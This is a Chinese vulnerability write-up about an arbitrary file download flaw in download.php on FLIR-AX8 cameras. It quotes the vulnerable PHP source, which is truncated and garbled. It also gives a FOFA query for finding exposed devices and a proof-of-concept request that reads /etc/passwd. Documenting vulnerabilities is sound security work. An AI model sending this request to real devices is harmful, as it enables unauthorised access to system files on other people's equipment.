FLIR-AX8 download.php 任意文件下载-棉花糖会员站

# FLIR-AX8 download.php 任意文件下载

## 漏洞描述

FLIR-AX8 download.php文件过滤不全存在任意文件下载漏洞

## 漏洞影响

> [!NOTE]
>
> FLIR-AX8

## FOFA

> [!NOTE]
>
> app=”FLIR-FLIR-AX8″

## 漏洞复现

出现漏洞的文件为 **download.php**

“`php
“application/octet-stream”,
“zip” => “application/zip”,
“mp3” => “audio/mpeg”,
“mpg” => “video/mpeg”,
“avi” => “video/x-msvideo”,
);
$ctype = isset($content_types[$file_ext]) ? $content_types[$file_ext] : $ctype_default;
header(“Content-Type: ” . $ctype);

//check if http_range is sent by browser (or download manager)
if(isset($_SERVER[‘HTTP_RANGE’]))
{
list($size_unit, $range_orig) = explode(‘=’, $_SERVER[‘HTTP_RANGE’], 2);
if ($size_unit == ‘bytes’)
{
//multiple ranges could be specified at the same time, but for simplicity only serve the first range
//http://tools.ietf.org/id/draft-ietf-http-range-retrieval-00.txt
list($range, $extra_ranges) = explode(‘,’, $range_orig, 2);
}
else
{
$range = ”;
header(‘HTTP/1.1 416 Requested Range Not Satisfiable’);
exit;
}
}
else
{
$range = ”;
}

//figure out download piece from range (if set)
list($seek_start, $seek_end) = explode(‘-‘, $range, 2);

ob_clean();

//set start and end based on range (if set), else set defaults
//also check for invalid ranges.
$seek_end = (empty($seek_end)) ? ($file_size – 1) : min(abs(intval($seek_end)),($file_size – 1));
$seek_start = (empty($seek_start) || $seek_end < abs(intval($seek_start))) ? 0 : max(abs(intval($seek_start)),0); //Only send partial content header if downloading a piece of the file (IE workaround) if ($seek_start > 0 || $seek_end < ($file_size - 1)) { header('HTTP/1.1 206 Partial Content'); header('Content-Range: bytes '.$seek_start.'-'.$seek_end.'/'.$file_size); header('Content-Length: '.($seek_end - $seek_start + 1)); } else header("Content-Length: $file_size"); header('Accept-Ranges: bytes'); set_time_limit(0); fseek($file, $seek_start); while(!feof($file)) { print(@fread($file, 1024*8)); ob_flush(); flush(); if (connection_status()!=0) { @fclose($file); exit; } } // file save was a success @fclose($file); exit; } else { // file couldn't be opened header("HTTP/1.0 500 Internal Server Error"); exit; } } else { // file does not exist header("HTTP/1.0 404 Not Found"); exit; } ?>
“`

简单审计可以发现 file参数为可控参数且没有过滤参数，导致可以下载任意文件

“`
/download.php?file=/etc/passwd
“`

文章版权归作者所有，未经允许请勿转载。

THE END